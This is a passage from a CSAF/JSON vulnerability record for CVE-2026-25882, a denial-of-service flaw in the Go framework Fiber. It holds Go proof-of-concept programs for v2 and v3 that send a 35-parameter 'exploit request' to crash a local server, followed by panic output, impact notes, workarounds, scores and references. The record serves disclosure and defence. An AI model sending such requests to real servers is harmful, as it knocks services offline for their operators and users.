(\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v3\"\n)\n\nfunc main() {\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"āœ“ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9999\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9999/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\nšŸ”“ Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:514 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"āœ— Request failed: %v\\n\", err)\n\t\tfmt.Println(\"šŸ’„ Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output:**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\nāœ“ Registration succeeded (NO PANIC)\n\nšŸ”“ Sending exploit request...\nExpected: panic at path.go:514 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v3.(*routeParser).getMatch(...)\n\t/path/to/fiber/path.go:514\ngithub.com/gofiber/fiber/v3.(*Route).match(...)\n\t/path/to/fiber/router.go:89\ngithub.com/gofiber/fiber/v3.(*App).next(...)\n\t/path/to/fiber/router.go:142\n```\n\n### For Fiber v2\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\t\"github.com/gofiber/fiber/v2\"\n)\n\nfunc main() {\n\tapp := fiber.New()\n\t\n\t// Register route with 35 parameters (exceeds maxParams=30)\n\tpath := \"/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\tpath += fmt.Sprintf(\"/:p%d\", i)\n\t}\n\t\n\tfmt.Printf(\"Registering route: %s...\\n\", path[:50]+\"...\")\n\tapp.Get(path, func(c *fiber.Ctx) error {\n\t\treturn c.SendString(\"Never reached\")\n\t})\n\tfmt.Println(\"āœ“ Registration succeeded (NO PANIC)\")\n\t\n\tgo func() {\n\t\tapp.Listen(\":9998\")\n\t}()\n\ttime.Sleep(200 * time.Millisecond)\n\t\n\t// Build exploit URL with 35 parameter values\n\turl := \"http://localhost:9998/test\"\n\tfor i := 1; i <= 35; i++ {\n\t\turl += fmt.Sprintf(\"/v%d\", i)\n\t}\n\t\n\tfmt.Println(\"\\nšŸ”“ Sending exploit request...\")\n\tfmt.Println(\"Expected: panic at path.go:516 params[paramsIterator] = path[:i]\\n\")\n\t\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\tfmt.Printf(\"āœ— Request failed: %v\\n\", err)\n\t\tfmt.Println(\"šŸ’„ Server crashed!\")\n\t} else {\n\t\tfmt.Printf(\"Response: %d\\n\", resp.StatusCode)\n\t\tresp.Body.Close()\n\t}\n}\n```\n\n**Output (v2):**\n```\nRegistering route: /test/:p1/:p2/:p3/:p4/:p5/:p6/:p7/:p8/:p9/:p10...\nāœ“ Registration succeeded (NO PANIC)\n\nšŸ”“ Sending exploit request...\nExpected: panic at path.go:516 params[paramsIterator] = path[:i]\n\npanic: runtime error: index out of range [30] with length 30\n\ngoroutine 40 [running]:\ngithub.com/gofiber/fiber/v2.(*routeParser).getMatch(...)\n\t/path/to/fiber/v2@v2.52.10/path.go:512\ngithub.com/gofiber/fiber/v2.(*Route).match(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:84\ngithub.com/gofiber/fiber/v2.(*App).next(...)\n\t/path/to/fiber/v2@v2.52.10/router.go:127\n```\n\n## Impact\n\n### Exploitation Requirements\n- No authentication required\n- Single HTTP request triggers crash\n- Trivially scriptable for sustained DoS\n- Works against any route with >30 parameters\n\n### Real-World Impact\n- **Public APIs**: Remote DoS attacks on vulnerable endpoints\n- **Microservices**: Cascade failures if vulnerable service is critical\n- **Auto-scaling**: Repeated crashes prevent proper recovery\n- **Monitoring**: Log flooding and alert fatigue\n\n### Likelihood\n**HIGH** - Exploitation requires only:\n- Knowledge of route structure (often public in APIs)\n- Standard HTTP client (curl, browser, etc.)\n- Single malformed request\n\n## Workarounds\n\nUntil patched, users should:\n\n1. **Audit Routes**: Ensure all routes have ā‰¤30 parameters\n ```bash\n # Search for potential issues\n grep -r \"/:.*/:.*/:.*\" . | grep -v node_modules\n ```\n\n2. **Disable Dynamic Routing**: If programmatically registering routes, validate parameter count:\n ```go\n paramCount := strings.Count(route, \":\")\n if paramCount > 30 {\n log.Fatal(\"Route exceeds maxParams\")\n }\n ```\n\n3. **Rate Limiting**: Deploy aggressive rate limiting to mitigate DoS impact\n\n4. **Monitoring**: Alert on panic patterns in application logs\n\n## Timeline\n\n- **2024-12-24**: Vulnerability discovered in v3 during PR #3962 review\n- **2024-12-25**: Proof of concept confirmed exploitability in v3\n- **2024-12-25**: Vulnerability confirmed to also exist in v2 (same root cause)\n- **2024-12-25**: Security advisory created\n\n## References\n\n- **v3 Related PR**: https://github.com/gofiber/fiber/pull/3962 (UpdateParam feature with defensive checks, doesn't fix root cause)\n- **Vulnerable Code Locations**:\n - v3: [path.go:514](https://github.com/gofiber/fiber/blob/main/path.go#L514)\n - v2: [path.go:516](https://github.com/gofiber/fiber/blob/v2/path.go#L516)\n\n## Credit\n\n**Discovered by:** @sixcolors (Fiber maintainer) and @TheAspectDev", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-mrq8-rjmw-wpq3.json?alt=media" }, { "category": "description", "text": "Fiber is an Express inspired web framework written in Go. A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching. Version 2.52.12 patches the issue in the v2 branch and 3.1.0 patches the issue in the v3 branch.", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-25882.json?alt=media" }, { "category": "description", "text": "Fiber has a Denial of Service Vulnerability via Route Parameter Overflow in github.com/gofiber/fiber", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4543.json?alt=media" }, { "category": "description", "text": "A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.", "title": "gitlab - https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fgofiber%2Ffiber%2Fv2%2FCVE-2026-25882.yml/raw" }, { "category": "description", "text": "A denial of service vulnerability exists in Fiber v2 and v3 that allows remote attackers to crash the application by sending requests to routes with more than 30 parameters. The vulnerability results from missing validation during route registration combined with an unbounded array write during request matching.", "title": "gitlab - https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fgofiber%2Ffiber%2Fv3%2FCVE-2026-25882.yml/raw" }, { "category": "other", "text": "0.0005", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P", "title": "CVSSV4" }, { "category": "other", "text": "6.9", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.6", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "fixed": [ "CSAFPID-5918984", "CSAFPID-5918986" ], "known_affected": [ "CSAFPID-5699780", "CSAFPID-5699784", "CSAFPID-5700112", "CSAFPID-5700113", "CSAFPID-3746874", "CSAFPID-3746875", "CSAFPID-3746876", "CSAFPID-3746877", "CSAFPID-3746878", "CSAFPID-3746879", "CSAFPID-3746880", "CSAFPID-3746881", "CSAFPID-3746882", "CSAFPID-3746883", "CSAFPID-3746884", "CSAFPID-3746885", "CSAFPID-3746886", "CSAFPID-3746887", "CSAFPID-3746888", "CSAFPID-3746889", "CSAFPID-3746890", "CSAFPID-3746891", "CSAFPID-3746892", "CSAFPID-3746893", "CSAFPID-3746894", "CSAFPID-3746895", "CSAFPID-3746896", "CSAFPID-3746897", "CSAFPID-3746898", "CSAFPID-3746899", "CSAFPID-3746900", "CSAFPID-3746901", "CSAFPID-3746902", "CSAFPID-3746903", "CSAFPID-3746904", "CSAFPID-3746905", "CSAFPID-3746906", "CSAFPID-3746907", "CSAFPID-3746908", "CSAFPID-3746909", "CSAFPID-3746910", "CSAFPID-3746911", "CSAFPID-3746912", "CSAFPID-3746913", "CSAFPID-3746914", "CSAFPID-3746915", "CSAFPID-3746916", "CSAFPID-3746917", "CSAFPID-3746918", "CSAFPID-3746919", "CSAFPID-3746920", "CSAFPID-3746921", "CSAFPID-3746922", "CSAFPID-3746923", "CSAFPID-3746924", "CSAFPID-3746925", "CSAFPID-3746926", "CSAFPID-3746927", "CSAFPID-3746928", "CSAFPID-3746929", "CSAFPID-3746930", "CSAFPID-3746931", "CSAFPID-3746932", "CSAFPID-3746933", "CSAFPID-3746934", "CSAFPID-3746935", "CSAFPID-3746936", "CSAFPID-3746937", "CSAFPID-3746938", "CSAFPID-3746939", "CSAFPID-3746940", "CSAFPID-3746941", "CSAFPID-3746942", "CSAFPID-3746943", "CSAFPID-3746944", "CSAFPID-3746945", "CSAFPID-3746946", "CSAFPID-3746947", "CSAFPID-3746948", "CSAFPID-3746949", "CSAFPID-3746950", "CSAFPID-3746951", "CSAFPID-3746952", "CSAFPID-3746953", "CSAFPID-3746954", "CSAFPID-3746955", "CSAFPID-3746956", "CSAFPID-3746957", "CSAFPID-3746958", "CSAFPID-3746959", "CSAFPID-3746960", "CSAFPID-3746961", "CSAFPID-3746962", "CSAFPID-5081894", "CSAFPID-5081895", "CSAFPID-5586939", "CSAFPID-5586940", "CSAFPID-5702051", "CSAFPID-5702052", "CSAFPID-5918985", "CSAFPID-5918987" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25882" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-25882" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25882" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/25xxx/CVE-2026-25882.json" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-mrq8-rjmw-wpq3" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-mrq8-rjmw-wpq3" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-mrq8-rjmw-wpq3.json?alt=media" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-25882.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25882" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4543.json?alt=media" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - gitlab", "url": "https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fgofiber%2Ffiber%2Fv2%2FCVE-2026-25882.yml/raw" }, { "category": "external", "summary": "Source - gitlab", "url": "https://gitlab.com/api/v4/projects/25847700/repository/files/go%2Fgithub.com%2Fgofiber%2Ffiber%2Fv3%2FCVE-2026-25882.yml/raw" }, { "category": "external", "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv", "url": "https://github.com/gofiber/fiber/blob/main/path.go#L514" }, { "category": "external", "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv", "url": "https://github.com/gofiber/fiber/blob/v2/path.go#L516" }, { "category": "external", "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv", "url": "https://github.com/gofiber/fiber/pull/3962" }, { "category": "external", "summary": "Reference - cveprojectv5; github; gitlab; nvd; osv", "url": "https://github.com/gofiber/fiber/security/advisories/GHSA-mrq8-rjmw-wpq3" }, { "category": "external", "summary": "Reference - github; gitlab", "url": "https://github.com/advisories/GHSA-mrq8-rjmw-wpq3" }, { "category": "external", "summary": "Reference - osv", "url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/25xxx/CVE-2026-25882.json" }, { "category": "external", "summary": "Reference - github; gitlab; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25882" }, { "category": "external", "summary": "Reference - github; gitlab; osv", "url": "https://pkg.go.dev/vuln/GO-2026-4543" }, { "category": "external", "summary": "Reference - gitlab", "url": "https://github.com/gofiber/fiber" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-3746874", "CSAFPID-3746875", "CSAFPID-3746876", "CSAFPID-3746877", "CSAFPID-3746878", "CSAFPID-3746879", "CSAFPID-3746880", "CSAFPID-3746881", "CSAFPID-3746882", "CSAFPID-3746883", "CSAFPID-3746884", "CSAFPID-3746885", "CSAFPID-3746886", "CSAFPID-3746887", "CSAFPID-3746888", "CSAFPID-3746889", "CSAFPID-3746890", "CSAFPID-3746891", "CSAFPID-3746892", "CSAFPID-3746893", "CSAFPID-3746894", "CSAFPID-3746895", "CSAFPID-3746896", "CSAFPID-3746897", "CSAFPID-3746898", "CSAFPID-3746899", "CSAFPID-3746900", "CSAFPID-3746901", "CSAFPID-3746902", "CSAFPID-3746903", "CSAFPID-3746904", "CSAFPID-3746905", "CSAFPID-3746906", "CSAFPID-3746907", "CSAFPID-3746908", "CSAFPID-3746909", "CSAFPID-3746910", "CSAFPID-3746911", "CSAFPID-3746912", "CSAFPID-3746913", "CSAFPID-3746914", "CSAFPID-3746915", "CSAFPID-3746916", "CSAFPID-3746917", "CSAFPID-3746918", "CSAFPID-3746919", "CSAFPID-3746920", "CSAFPID-3746921", "CSAFPID-3746922", "CSAFPID-3746923", "CSAFPID-3746924", "CSAFPID-3746925", "CSAFPID-3746926", "CSAFPID-3746927", "CSAFPID-3746928", "CSAFPID-3746929", "CSAFPID-3746930", "CSAFPID-3746931", "CSAFPID-3746932", "CSAFPID-3746933", "CSAFPID-3746934", "CSAFPID-3746935", "CSAFPID-3746936", "CSAFPID-3746937", "CSAFPID-3746938", "CSAFPID-3746939", "CSAFPID-3746940", "CSAFPID-3746941", "CSAFPID-3746942", "CSAFPID-3746943", "CSAFPID-3746944", "CSAFPID-3746945", "CSAFPID-3746946", "CSAFPID-3746947", "CSAFPID-3746948", "CSAFPID-3746949", "CSAFPID-3746950", "CSAFPID-3746951", "CSAFPID-3746952", "CSAFPID-3746953", "CSAFPID-3746954", "CSAFPID-3746955", "CSAFPID-3746956", "CSAFPID-3746957", "CSAFPID-3746958", "CSAFPID-3746959", "CSAFPID-3746960", "CSAFPID-3746961", "CSAFPID-3746962", "CSAFPID-5081894", "CSAFPID-5081895", "CSAFPID-5586939", "CSAFPID-5586940", "CSAFPID-5699780", "CSAFPID-5699784", "CSAFPID-5700112", "CSAFPID-5700113", "CSAFPID-5702051", "CSAFPID-5702052", "CSAFPID-5918985", "CSAFPID-5918987" ] } ], "title": "CVE-2026-25882" } ] }